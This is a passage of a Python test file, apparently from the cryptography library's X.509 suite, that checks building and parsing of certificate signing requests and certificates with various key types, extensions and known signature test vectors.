request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, None, backend)
assert request.signature_hash_algorithm is None
public_key = request.public_key()
assert isinstance(public_key, ed25519.Ed25519PublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_ca_request_with_ed448(self, backend):
private_key = ed448.Ed448PrivateKey.generate()
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, None, backend)
assert request.signature_hash_algorithm is None
public_key = request.public_key()
assert isinstance(public_key, ed448.Ed448PublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.requires_backend_interface(interface=DSABackend)
def test_build_ca_request_with_dsa(self, backend):
private_key = DSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, dsa.DSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
def test_add_duplicate_extension(self):
builder = x509.CertificateSigningRequestBuilder().add_extension(
x509.BasicConstraints(True, 2), critical=True,
)
with pytest.raises(ValueError):
builder.add_extension(
x509.BasicConstraints(True, 2), critical=True,
)
def test_set_invalid_subject(self):
builder = x509.CertificateSigningRequestBuilder()
with pytest.raises(TypeError):
builder.subject_name('NotAName')
def test_add_invalid_extension_type(self):
builder = x509.CertificateSigningRequestBuilder()
with pytest.raises(TypeError):
builder.add_extension(object(), False)
def test_add_unsupported_extension(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
builder = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).add_extension(
DummyExtension(), False
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA256(), backend)
def test_key_usage(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
),
critical=False
).sign(private_key, hashes.SHA256(), backend)
assert len(request.extensions) == 1
ext = request.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext.critical is False
assert ext.value == x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
)
def test_key_usage_key_agreement_bit(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=True
),
critical=False
).sign(private_key, hashes.SHA256(), backend)
assert len(request.extensions) == 1
ext = request.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext.critical is False
assert ext.value == x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=True
)
def test_add_two_extensions(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
ext = request.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(ext.value) == [x509.DNSName(u"cryptography.io")]
def test_set_subject_twice(self):
builder = x509.CertificateSigningRequestBuilder()
builder = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
)
with pytest.raises(ValueError):
builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
)
def test_subject_alt_names(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
san = x509.SubjectAlternativeName([
x509.DNSName(u"example.com"),
x509.DNSName(u"*.example.com"),
x509.RegisteredID(x509.ObjectIdentifier("1.2.3.4.5.6.7")),
x509.DirectoryName(x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u'PyCA'),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u'We heart UTF8!\u2122'
)
])),
x509.IPAddress(ipaddress.ip_address(u"127.0.0.1")),
x509.IPAddress(ipaddress.ip_address(u"ff::")),
x509.OtherName(
type_id=x509.ObjectIdentifier("1.2.3.3.3.3"),
value=b"0\x03\x02\x01\x05"
),
x509.RFC822Name(u"test@example.com"),
x509.RFC822Name(u"email"),
x509.RFC822Name(u"email@xn--eml-vla4c.com"),
x509.UniformResourceIdentifier(
u"https://xn--80ato2c.cryptography"
),
x509.UniformResourceIdentifier(
u"gopher://cryptography:70/some/path"
),
])
csr = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"SAN"),
])
).add_extension(
san,
critical=False,
).sign(private_key, hashes.SHA256(), backend)
assert len(csr.extensions) == 1
ext = csr.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert not ext.critical
assert ext.oid == ExtensionOID.SUBJECT_ALTERNATIVE_NAME
assert ext.value == san
def test_invalid_asn1_othername(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"SAN"),
])
).add_extension(
x509.SubjectAlternativeName([
x509.OtherName(
type_id=x509.ObjectIdentifier("1.2.3.3.3.3"),
value=b"\x01\x02\x01\x05"
),
]),
critical=False,
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
def test_subject_alt_name_unsupported_general_name(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"SAN"),
])
).add_extension(
x509.SubjectAlternativeName([FakeGeneralName("")]),
critical=False,
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
def test_extended_key_usage(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
eku = x509.ExtendedKeyUsage([
ExtendedKeyUsageOID.CLIENT_AUTH,
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CODE_SIGNING,
])
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).add_extension(
eku, critical=False
).sign(private_key, hashes.SHA256(), backend)
ext = request.extensions.get_extension_for_oid(
ExtensionOID.EXTENDED_KEY_USAGE
)
assert ext.critical is False
assert ext.value == eku
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_rsa_key_too_small(self, backend):
private_key = RSA_KEY_512.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
)
with pytest.raises(ValueError) as exc:
builder.sign(private_key, hashes.SHA512(), backend)
assert str(exc.value) == "Digest too big for RSA key"
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_aia(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
aia = x509.AuthorityInformationAccess([
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier(u"http://ocsp.domain.com")
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier(u"http://domain.com/ca.crt")
)
])
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
aia, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_INFORMATION_ACCESS
)
assert ext.value == aia
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ski(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
ski = x509.SubjectKeyIdentifier.from_public_key(
subject_private_key.public_key()
)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
ski, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
assert ext.value == ski
@pytest.mark.parametrize(
"aki",
[
x509.AuthorityKeyIdentifier(
b"\xc3\x9c\xf3\xfc\xd3F\x084\xbb\xceF\x7f\xa0|[\xf3\xe2\x08"
b"\xcbY",
None,
None
),
x509.AuthorityKeyIdentifier(
b"\xc3\x9c\xf3\xfc\xd3F\x084\xbb\xceF\x7f\xa0|[\xf3\xe2\x08"
b"\xcbY",
[
x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u"PyCA"
),
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
)
])
)
],
333
),
x509.AuthorityKeyIdentifier(
None,
[
x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u"PyCA"
),
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
)
])
)
],
333
),
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_aki(self, aki, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
aki, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
)
assert ext.value == aki
def test_ocsp_nocheck(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.OCSPNoCheck(), critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.OCSP_NO_CHECK
)
assert isinstance(ext.value, x509.OCSPNoCheck)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestDSACertificate(object):
def test_load_dsa_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA1)
public_key = cert.public_key()
assert isinstance(public_key, dsa.DSAPublicKey)
num = public_key.public_numbers()
assert num.y == int(
"4c08bfe5f2d76649c80acf7d431f6ae2124b217abc8c9f6aca776ddfa94"
"53b6656f13e543684cd5f6431a314377d2abfa068b7080cb8ddc065afc2"
"dea559f0b584c97a2b235b9b69b46bc6de1aed422a6f341832618bcaae2"
"198aba388099dafb05ff0b5efecb3b0ae169a62e1c72022af50ae68af3b"
"033c18e6eec1f7df4692c456ccafb79cc7e08da0a5786e9816ceda651d6"
"1b4bb7b81c2783da97cea62df67af5e85991fdc13aff10fc60e06586386"
"b96bb78d65750f542f86951e05a6d81baadbcd35a2e5cad4119923ae6a2"
"002091a3d17017f93c52970113cdc119970b9074ca506eac91c3dd37632"
"5df4af6b3911ef267d26623a5a1c5df4a6d13f1c", 16
)
assert num.parameter_numbers.g == int(
"4b7ced71dc353965ecc10d441a9a06fc24943a32d66429dd5ef44d43e67"
"d789d99770aec32c0415dc92970880872da45fef8dd1e115a3e4801387b"
"a6d755861f062fd3b6e9ea8e2641152339b828315b1528ee6c7b79458d2"
"1f3db973f6fc303f9397174c2799dd2351282aa2d8842c357a73495bbaa"
"c4932786414c55e60d73169f5761036fba29e9eebfb049f8a3b1b7cee6f"
"3fbfa136205f130bee2cf5b9c38dc1095d4006f2e73335c07352c64130a"
"1ab2b89f13b48f628d3cc3868beece9bb7beade9f830eacc6fa241425c0"
"b3fcc0df416a0c89f7bf35668d765ec95cdcfbe9caff49cfc156c668c76"
"fa6247676a6d3ac945844a083509c6a1b436baca", 16
)
assert num.parameter_numbers.p == int(
"bfade6048e373cd4e48b677e878c8e5b08c02102ae04eb2cb5c46a523a3"
"af1c73d16b24f34a4964781ae7e50500e21777754a670bd19a7420d6330"
"84e5556e33ca2c0e7d547ea5f46a07a01bf8669ae3bdec042d9b2ae5e6e"
"cf49f00ba9dac99ab6eff140d2cedf722ee62c2f9736857971444c25d0a"
"33d2017dc36d682a1054fe2a9428dda355a851ce6e6d61e03e419fd4ca4"
"e703313743d86caa885930f62ed5bf342d8165627681e9cc3244ba72aa2"
"2148400a6bbe80154e855d042c9dc2a3405f1e517be9dea50562f56da93"
"f6085f844a7e705c1f043e65751c583b80d29103e590ccb26efdaa0893d"
"833e36468f3907cfca788a3cb790f0341c8a31bf", 16
)
assert num.parameter_numbers.q == int(
"822ff5d234e073b901cf5941f58e1f538e71d40d", 16
)
def test_signature(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.signature == binascii.unhexlify(
b"302c021425c4a84a936ab311ee017d3cbd9a3c650bb3ae4a02145d30c64b4326"
b"86bdf925716b4ed059184396bcce"
)
r, s = decode_dss_signature(cert.signature)
assert r == 215618264820276283222494627481362273536404860490
assert s == 532023851299196869156027211159466197586787351758
def test_tbs_certificate_bytes(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.tbs_certificate_bytes == binascii.unhexlify(
b"3082051aa003020102020900a37352e0b2142f86300906072a8648ce3804033"
b"067310b3009060355040613025553310e300c06035504081305546578617331"
b"0f300d0603550407130641757374696e3121301f060355040a1318496e74657"
b"26e6574205769646769747320507479204c7464311430120603550403130b50"
b"79434120445341204341301e170d3134313132373035313431375a170d31343"
b"13232373035313431375a3067310b3009060355040613025553310e300c0603"
b"55040813055465786173310f300d0603550407130641757374696e3121301f0"
b"60355040a1318496e7465726e6574205769646769747320507479204c746431"
b"1430120603550403130b50794341204453412043413082033a3082022d06072"
b"a8648ce380401308202200282010100bfade6048e373cd4e48b677e878c8e5b"
b"08c02102ae04eb2cb5c46a523a3af1c73d16b24f34a4964781ae7e50500e217"
b"77754a670bd19a7420d633084e5556e33ca2c0e7d547ea5f46a07a01bf8669a"
b"e3bdec042d9b2ae5e6ecf49f00ba9dac99ab6eff140d2cedf722ee62c2f9736"
b"857971444c25d0a33d2017dc36d682a1054fe2a9428dda355a851ce6e6d61e0"
b"3e419fd4ca4e703313743d86caa885930f62ed5bf342d8165627681e9cc3244"
b"ba72aa22148400a6bbe80154e855d042c9dc2a3405f1e517be9dea50562f56d"
b"a93f6085f844a7e705c1f043e65751c583b80d29103e590ccb26efdaa0893d8"
b"33e36468f3907cfca788a3cb790f0341c8a31bf021500822ff5d234e073b901"
b"cf5941f58e1f538e71d40d028201004b7ced71dc353965ecc10d441a9a06fc2"
b"4943a32d66429dd5ef44d43e67d789d99770aec32c0415dc92970880872da45"
b"fef8dd1e115a3e4801387ba6d755861f062fd3b6e9ea8e2641152339b828315"
b"b1528ee6c7b79458d21f3db973f6fc303f9397174c2799dd2351282aa2d8842"
b"c357a73495bbaac4932786414c55e60d73169f5761036fba29e9eebfb049f8a"
b"3b1b7cee6f3fbfa136205f130bee2cf5b9c38dc1095d4006f2e73335c07352c"
b"64130a1ab2b89f13b48f628d3cc3868beece9bb7beade9f830eacc6fa241425"
b"c0b3fcc0df416a0c89f7bf35668d765ec95cdcfbe9caff49cfc156c668c76fa"
b"6247676a6d3ac945844a083509c6a1b436baca0382010500028201004c08bfe"
b"5f2d76649c80acf7d431f6ae2124b217abc8c9f6aca776ddfa9453b6656f13e"
b"543684cd5f6431a314377d2abfa068b7080cb8ddc065afc2dea559f0b584c97"
b"a2b235b9b69b46bc6de1aed422a6f341832618bcaae2198aba388099dafb05f"
b"f0b5efecb3b0ae169a62e1c72022af50ae68af3b033c18e6eec1f7df4692c45"
b"6ccafb79cc7e08da0a5786e9816ceda651d61b4bb7b81c2783da97cea62df67"
b"af5e85991fdc13aff10fc60e06586386b96bb78d65750f542f86951e05a6d81"
b"baadbcd35a2e5cad4119923ae6a2002091a3d17017f93c52970113cdc119970"
b"b9074ca506eac91c3dd376325df4af6b3911ef267d26623a5a1c5df4a6d13f1"
b"ca381cc3081c9301d0603551d0e04160414a4fb887a13fcdeb303bbae9a1dec"
b"a72f125a541b3081990603551d2304819130818e8014a4fb887a13fcdeb303b"
b"bae9a1deca72f125a541ba16ba4693067310b3009060355040613025553310e"
b"300c060355040813055465786173310f300d0603550407130641757374696e3"
b"121301f060355040a1318496e7465726e657420576964676974732050747920"
b"4c7464311430120603550403130b5079434120445341204341820900a37352e"
b"0b2142f86300c0603551d13040530030101ff"
)
cert.public_key().verify(
cert.signature, cert.tbs_certificate_bytes,
cert.signature_hash_algorithm
)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestDSACertificateRequest(object):
@pytest.mark.parametrize(
("path", "loader_func"),
[
[
os.path.join("x509", "requests", "dsa_sha1.pem"),
x509.load_pem_x509_csr
],
[
os.path.join("x509", "requests", "dsa_sha1.der"),
x509.load_der_x509_csr
],
]
)
def test_load_dsa_request(self, path, loader_func, backend):
request = _load_cert(path, loader_func, backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, dsa.DSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
]
def test_signature(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "dsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.signature == binascii.unhexlify(
b"302c021461d58dc028d0110818a7d817d74235727c4acfdf0214097b52e198e"
b"ce95de17273f0a924df23ce9d8188"
)
def test_tbs_certrequest_bytes(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "dsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.tbs_certrequest_bytes == binascii.unhexlify(
b"3082021802010030573118301606035504030c0f63727970746f677261706879"
b"2e696f310d300b060355040a0c0450794341310b300906035504061302555331"
b"0e300c06035504080c055465786173310f300d06035504070c0641757374696e"
b"308201b63082012b06072a8648ce3804013082011e028181008d7fadbc09e284"
b"aafa69154cea24177004909e519f8b35d685cde5b4ecdc9583e74d370a0f88ad"
b"a98f026f27762fb3d5da7836f986dfcdb3589e5b925bea114defc03ef81dae30"
b"c24bbc6df3d588e93427bba64203d4a5b1687b2b5e3b643d4c614976f89f95a3"
b"8d3e4c89065fba97514c22c50adbbf289163a74b54859b35b7021500835de56b"
b"d07cf7f82e2032fe78949aed117aa2ef0281801f717b5a07782fc2e4e68e311f"
b"ea91a54edd36b86ac634d14f05a68a97eae9d2ef31fb1ef3de42c3d100df9ca6"
b"4f5bdc2aec7bfdfb474cf831fea05853b5e059f2d24980a0ac463f1e818af352"
b"3e3cb79a39d45fa92731897752842469cf8540b01491024eaafbce6018e8a1f4"
b"658c343f4ba7c0b21e5376a21f4beb8491961e038184000281800713f07641f6"
b"369bb5a9545274a2d4c01998367fb371bb9e13436363672ed68f82174c2de05c"
b"8e839bc6de568dd50ba28d8d9d8719423aaec5557df10d773ab22d6d65cbb878"
b"04a697bc8fd965b952f9f7e850edf13c8acdb5d753b6d10e59e0b5732e3c82ba"
b"fa140342bc4a3bba16bd0681c8a6a2dbbb7efe6ce2b8463b170ba000"
)
request.public_key().verify(
request.signature,
request.tbs_certrequest_bytes,
request.signature_hash_algorithm
)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestECDSACertificate(object):
def test_load_ecdsa_cert(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
cert = _load_cert(
os.path.join("x509", "ecdsa_root.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA384)
public_key = cert.public_key()
assert isinstance(public_key, ec.EllipticCurvePublicKey)
num = public_key.public_numbers()
assert num.x == int(
"dda7d9bb8ab80bfb0b7f21d2f0bebe73f3335d1abc34eadec69bbcd095f"
"6f0ccd00bba615b51467e9e2d9fee8e630c17", 16
)
assert num.y == int(
"ec0770f5cf842e40839ce83f416d3badd3a4145936789d0343ee10136c7"
"2deae88a7a16bb543ce67dc23ff031ca3e23e", 16
)
assert isinstance(num.curve, ec.SECP384R1)
def test_signature(self, backend):
cert = _load_cert(
os.path.join("x509", "ecdsa_root.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.signature == binascii.unhexlify(
b"3065023100adbcf26c3f124ad12d39c30a099773f488368c8827bbe6888d5085"
b"a763f99e32de66930ff1ccb1098fdd6cabfa6b7fa0023039665bc2648db89e50"
b"dca8d549a2edc7dcd1497f1701b8c8868f4e8c882ba89aa98ac5d100bdf854e2"
b"9ae55b7cb32717"
)
r, s = decode_dss_signature(cert.signature)
assert r == int(
"adbcf26c3f124ad12d39c30a099773f488368c8827bbe6888d5085a763f99e32"
"de66930ff1ccb1098fdd6cabfa6b7fa0",
16
)
assert s == int(
"39665bc2648db89e50dca8d549a2edc7dcd1497f1701b8c8868f4e8c882ba89a"
"a98ac5d100bdf854e29ae55b7cb32717",
16
)
def test_tbs_certificate_bytes(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
cert = _load_cert(
os.path.join("x509", "ecdsa_root.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.tbs_certificate_bytes == binascii.unhexlify(
b"308201c5a0030201020210055556bcf25ea43535c3a40fd5ab4572300a06082"
b"a8648ce3d0403033061310b300906035504061302555331153013060355040a"
b"130c446967694365727420496e6331193017060355040b13107777772e64696"
b"769636572742e636f6d3120301e06035504031317446967694365727420476c"
b"6f62616c20526f6f74204733301e170d3133303830313132303030305a170d3"
b"338303131353132303030305a3061310b300906035504061302555331153013"
b"060355040a130c446967694365727420496e6331193017060355040b1310777"
b"7772e64696769636572742e636f6d3120301e06035504031317446967694365"
b"727420476c6f62616c20526f6f742047333076301006072a8648ce3d0201060"
b"52b8104002203620004dda7d9bb8ab80bfb0b7f21d2f0bebe73f3335d1abc34"
b"eadec69bbcd095f6f0ccd00bba615b51467e9e2d9fee8e630c17ec0770f5cf8"
b"42e40839ce83f416d3badd3a4145936789d0343ee10136c72deae88a7a16bb5"
b"43ce67dc23ff031ca3e23ea3423040300f0603551d130101ff040530030101f"
b"f300e0603551d0f0101ff040403020186301d0603551d0e04160414b3db48a4"
b"f9a1c5d8ae3641cc1163696229bc4bc6"
)
cert.public_key().verify(
cert.signature, cert.tbs_certificate_bytes,
ec.ECDSA(cert.signature_hash_algorithm)
)
def test_load_ecdsa_no_named_curve(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
cert = _load_cert(
os.path.join("x509", "custom", "ec_no_named_curve.pem"),
x509.load_pem_x509_certificate,
backend
)
with pytest.raises(NotImplementedError):
cert.public_key()
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
class TestECDSACertificateRequest(object):
@pytest.mark.parametrize(
("path", "loader_func"),
[
[
os.path.join("x509", "requests", "ec_sha256.pem"),
x509.load_pem_x509_csr
],
[
os.path.join("x509", "requests", "ec_sha256.der"),
x509.load_der_x509_csr
],
]
)
def test_load_ecdsa_certificate_request(self, path, loader_func, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
request = _load_cert(path, loader_func, backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA256)
public_key = request.public_key()
assert isinstance(public_key, ec.EllipticCurvePublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
]
def test_signature(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
request = _load_cert(
os.path.join("x509", "requests", "ec_sha256.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.signature == binascii.unhexlify(
b"306502302c1a9f7de8c1787332d2307a886b476a59f172b9b0e250262f3238b1"
b"b45ee112bb6eb35b0fb56a123b9296eb212dffc302310094cf440c95c52827d5"
b"56ae6d76500e3008255d47c29f7ee782ed7558e51bfd76aa45df6d999ed5c463"
b"347fe2382d1751"
)
def test_tbs_certrequest_bytes(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
request = _load_cert(
os.path.join("x509", "requests", "ec_sha256.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.tbs_certrequest_bytes == binascii.unhexlify(
b"3081d602010030573118301606035504030c0f63727970746f6772617068792"
b"e696f310d300b060355040a0c0450794341310b300906035504061302555331"
b"0e300c06035504080c055465786173310f300d06035504070c0641757374696"
